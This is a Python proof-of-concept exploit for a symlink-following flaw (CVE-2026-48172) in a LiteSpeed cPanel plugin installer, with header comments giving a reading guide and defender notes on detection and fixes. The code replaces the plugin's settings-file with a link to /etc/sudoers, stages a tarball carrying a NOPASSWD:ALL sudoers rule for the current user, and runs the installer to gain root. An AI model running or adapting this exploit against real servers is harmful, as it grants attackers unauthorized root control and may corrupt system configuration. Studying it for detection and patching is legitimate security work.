#!/usr/bin/env python3
# CVE-2026-48172 PoC exploit by HORKimhab
#
# Reading guide (everything here is taken from the code below):
#   1. the plugin's settings-file is replaced by a symlink to /etc/sudoers;
#   2. an archive named ls_web_cache_mgr.tar.gz is staged in /usr/src, holding a
#      settings-file with a NOPASSWD sudoers rule for the invoking user;
#   3. the install-cpanel-plugin script is executed.
# The weakness class being demonstrated is link following (CWE-59): a writer
# that resolves a symlink planted by a less-privileged user.
#
# NOTE(review): the installer is launched without sudo, so the write to
# /etc/sudoers can only succeed if the installer itself runs with elevated
# rights, or if this script is already started by a privileged account. The
# page does not show which; confirm against the vendor advisory.
# NOTE(review): how the installer consumes the archive (extract, copy,
# overwrite vs. append) is not visible here. If it overwrites through the link,
# the previous contents of /etc/sudoers are lost, which matters for recovery.
#
# Defender view:
#   - Detection: a symlink at PLUGIN_PATH/settings-file, an unexpected
#     ls_web_cache_mgr.tar.gz in /usr/src, or a change to /etc/sudoers that
#     file-integrity monitoring or auditd attributes to the installer.
#   - Triage: `visudo -c` to validate the file, and review for NOPASSWD entries
#     that configuration management did not place.
#   - Fix side: a privileged installer should refuse to write through symlinks
#     (lstat / O_NOFOLLOW) and should only read packages from root-owned paths.

import os
import subprocess
import tarfile
import tempfile
from pathlib import Path

# === Config ===
PLUGIN_PATH = Path("/usr/local/cpanel/base/3rdparty/ls_web_cache_mgr")
SETTINGS_FILE = PLUGIN_PATH / "settings-file"
PACKAGE_DIR = Path("/usr/src")
PACKAGE_NAME = "ls_web_cache_mgr.tar.gz"
INSTALLER_SCRIPT = Path("/usr/local/lsws/admin/misc/pluginmgr/install-cpanel-plugin")


def check_prereqs():
    """Raise FileNotFoundError unless the plugin directory and installer exist.

    Only existence is checked. Whether the caller may modify PLUGIN_PATH or
    write to PACKAGE_DIR is not tested here, so those failures surface later
    as OSError from the calls in exploit().
    """
    required = (
        ("Plugin path", PLUGIN_PATH),
        ("Installer script", INSTALLER_SCRIPT),
    )
    for label, location in required:
        if not location.exists():
            raise FileNotFoundError(f"{label} not found: {location}")


def build_malicious_package(username: str, output_file: Path):
    """Write a gzip tarball with ls_web_cache_mgr/settings-file to output_file.

    Args:
        username: account name placed in the sudoers-style rule.
        output_file: destination path of the .tar.gz archive.

    The single archived file holds one line in sudoers syntax. The staging
    tree lives in a temporary directory that is removed on exit, so the
    archive must be written before the ``with`` block ends.
    """
    rule = f"{username} ALL=(ALL) NOPASSWD:ALL\n"
    with tempfile.TemporaryDirectory() as staging:
        tree = Path(staging) / "ls_web_cache_mgr"
        tree.mkdir(parents=True)
        (tree / "settings-file").write_text(rule)
        with tarfile.open(output_file, "w:gz") as archive:
            archive.add(tree, arcname="ls_web_cache_mgr")


def exploit():
    """Run the three PoC steps in order: plant link, stage archive, run installer.

    Raises:
        FileNotFoundError: from check_prereqs() when a required path is absent.
        subprocess.CalledProcessError: when the installer exits non-zero.
    """
    # $USER is caller-controlled; whoami is only consulted when it is unset/empty.
    user = os.getenv("USER")
    if not user:
        user = subprocess.check_output(["whoami"]).decode().strip()
    print(f"[+] Current user: {user}")

    check_prereqs()

    print("[+] Replacing settings-file with symlink to /etc/sudoers...")
    # is_symlink() covers a dangling link, for which exists() returns False.
    if SETTINGS_FILE.exists() or SETTINGS_FILE.is_symlink():
        SETTINGS_FILE.unlink()
    SETTINGS_FILE.symlink_to("/etc/sudoers")

    malicious_archive = PACKAGE_DIR / PACKAGE_NAME
    print(f"[+] Building malicious archive at {malicious_archive}")
    build_malicious_package(user, malicious_archive)

    print("[+] Triggering installer script...")
    # Argument list, no shell. check=True turns a non-zero exit into an exception.
    subprocess.run([str(INSTALLER_SCRIPT)], check=True)

    print("[+] Exploit complete. Verify sudoers:")
    print(f" grep {user} /etc/sudoers")


if __name__ == "__main__":
    exploit()